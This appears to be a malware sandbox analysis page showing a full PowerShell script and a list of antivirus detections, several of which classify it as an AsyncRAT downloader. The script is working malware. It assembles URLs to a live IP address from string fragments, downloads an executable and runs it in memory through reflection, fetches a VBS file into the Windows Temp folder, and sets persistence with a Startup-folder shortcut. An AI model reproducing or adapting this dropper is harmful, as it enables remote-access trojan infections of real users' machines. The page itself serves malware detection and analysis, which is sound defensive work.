Static | ZeroBOX
No static analysis available.
function JkzYp-FbRq {
Add-Type -AssemblyName System.Net
return New-Object System.Net.WebClient
function WgNrT-VbDl {
$aL = @('http', '://', '185', '.', '39', '.', '17', '.', '70', '/zgrnf/', 'pixel.exe')
return ($aL -join '')
function RmQce-LsXt {
$hP = @('http', '://', '185', '.', '39', '.', '17', '.', '70', '/zgrnf/', 'nums.vbs')
return ($hP -join '')
function OiqPw-YvKe {
param([string]$xU)
$qE = JkzYp-FbRq
return $qE.DownloadData($xU)
function ZdSlj-PxMv {
param([string]$rO)
$zN = JkzYp-FbRq
return $zN.DownloadString($rO)
function KxVoD-EgFt {
param([byte[]]$bK)
return [System.Reflection.Assembly]::Load($bK)
function QzHgn-TdUw {
param([System.Reflection.Assembly]$gJ)
$pL = $gJ.EntryPoint
if ($pL) {
$pL.Invoke($null, @())
function NlCvA-WsQx {
param([string]$mT, [string]$yZ)
[System.IO.File]::WriteAllText($yZ, $mT)
$kI = WgNrT-VbDl
$lE = RmQce-LsXt
$dB = OiqPw-YvKe -xU $kI
$xG = KxVoD-EgFt -bK $dB
QzHgn-TdUw -gJ $xG
$oY = ZdSlj-PxMv -rO $lE
$wJ = "C:\Windows\Temp\nums.vbs"
NlCvA-WsQx -mT $oY -yZ $wJ
$sF = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\App.url"
$vK = "[InternetShortcut]`nURL=file:///$wJ"
[System.IO.File]::WriteAllText($sF, $vK)
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.trojan.asyncrat
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericKD.76289393
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Trojan/PS.Agent.ax
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 GenScript.QHM
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Trojan.GenericKD.76289393
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.76289393
Tencent Win32.Trojan.Generic.Ftgl
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Trojan.GenericKD.76289393
TrendMicro Clean
CMC Clean
Emsisoft Trojan.GenericKD.76289393 (B)
Ikarus Trojan-Downloader.PowerShell.AsyncRAT
GData Trojan.GenericKD.76289393
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Trojan[Downloader]/PowerShell.AsyncRAT
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D48C1571
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft TrojanDownloader:PowerShell/AsyncRAT.LJC!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.